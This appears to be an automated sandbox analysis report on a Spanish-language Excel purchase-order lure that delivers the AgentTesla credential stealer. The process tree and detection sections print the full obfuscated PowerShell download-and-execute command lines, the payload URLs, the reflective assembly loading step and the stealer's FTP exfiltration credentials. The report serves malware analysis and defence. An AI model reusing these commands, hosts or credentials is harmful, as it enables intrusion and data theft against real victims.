Edit tour

Windows Analysis Report
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

Overview

General Information

Sample name:	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx renamed because original name is a hash value
Original sample name:	Envo de Orden de Compra No. 43456435344657.xla.xlsx
Analysis ID:	1559093
MD5:	73346e64a29d684532eca0a6a17e8f4c
SHA1:	61980a1ee86bfe46bccfc5d2262c635dc06bf6b6
SHA256:	18675f25203e08b39f835cec09a3697c6b1998dadcf22ba528828184f9f4515a
Tags:	xlaxlsxuser-abuse_ch
Infos:

Detection

AgentTesla, HTMLPhisher

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected HtmlPhish44

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for sample

Microsoft Office drops suspicious files

Obfuscated command line found

PowerShell case anomaly found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3216 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

mshta.exe (PID: 3540 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 3656 cmdline: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 3760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 3880 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 3892 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6826.tmp" "c:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 3972 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" MD5: 045451FA238A75305CC26AC982472367)

powershell.exe (PID: 4016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 2964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

AddInProcess32.exe (PID: 1972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)

AddInProcess32.exe (PID: 2228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)

AcroRd32.exe (PID: 2464 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.elquijotebanquetes.com", "Username": "mybloddycockcpanel_owner@elquijotebanquetes.com", "Password": "4r@d15PS!-!h"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingswithgreatsituationshandletotheprogress[1].hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.643424873.0000000002355000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 4016	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1dee1:$b3: ::UTF8.GetString( 0x58ed0:$b3: ::UTF8.GetString( 0x59788:$b3: ::UTF8.GetString( 0x5b25b:$b3: ::UTF8.GetString( 0x5bbfd:$b3: ::UTF8.GetString( 0x5f30a:$b3: ::UTF8.GetString( 0x7b5ab:$b3: ::UTF8.GetString( 0x7bfb9:$b3: ::UTF8.GetString( 0x7c963:$b3: ::UTF8.GetString( 0x7d55f:$b3: ::UTF8.GetString( 0x7e17e:$b3: ::UTF8.GetString( 0x7ed0d:$b3: ::UTF8.GetString( 0xa313b:$b3: ::UTF8.GetString( 0xa3ade:$b3: ::UTF8.GetString( 0xa7a2b:$b3: ::UTF8.GetString( 0xa886d:$b3: ::UTF8.GetString( 0xa9217:$b3: ::UTF8.GetString( 0xa9e40:$b3: ::UTF8.GetString( 0xaae3a:$b3: ::UTF8.GetString( 0xad37f:$b3: ::UTF8.GetString( 0xc6ba2:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 2964	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2964	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2c9d2:$b2: ::FromBase64String( 0x2e19f:$b2: ::FromBase64String( 0x18d6a:$b3: ::UTF8.GetString( 0x193eb:$b3: ::UTF8.GetString( 0x2b8a9:$b3: ::UTF8.GetString( 0x2c79b:$b3: ::UTF8.GetString( 0x2dfa6:$b3: ::UTF8.GetString( 0x73d81:$b3: ::UTF8.GetString( 0x745e9:$b3: ::UTF8.GetString( 0x9ee2c:$b3: ::UTF8.GetString( 0x9f953:$b3: ::UTF8.GetString( 0xa8c5b:$b3: ::UTF8.GetString( 0xad4f9:$b3: ::UTF8.GetString( 0xadbf4:$b3: ::UTF8.GetString( 0xaed95:$b3: ::UTF8.GetString( 0xb865d:$b3: ::UTF8.GetString( 0xb8d50:$b3: ::UTF8.GetString( 0xa772:$s1: -join 0xc1b0:$s1: -join 0x18f40:$s1: -join 0x1928f:$s1: -JoiN
Process Memory Space: AddInProcess32.exe PID: 2228	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AddInProcess32.exe PID: 2228	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
18.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
18.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
18.2.AddInProcess32.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34673:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x346e5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3476f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34801:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3486b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x348dd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34973:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34a03:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
18.2.AddInProcess32.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x31783:$s2: GetPrivateProfileString 0x30d7a:$s3: get_OSFullName 0x32505:$s5: remove_Key 0x326e8:$s5: remove_Key 0x335e8:$s6: FtpWebRequest 0x34655:$s7: logins 0x34bc7:$s7: logins 0x378aa:$s7: logins 0x3798a:$s7: logins 0x392dd:$s7: logins 0x38524:$s9: 1.85 (Hash, version 2, native byte-order)

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdl

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3216, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingswithgreatsituationshandletotheprogress[1].hta

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - 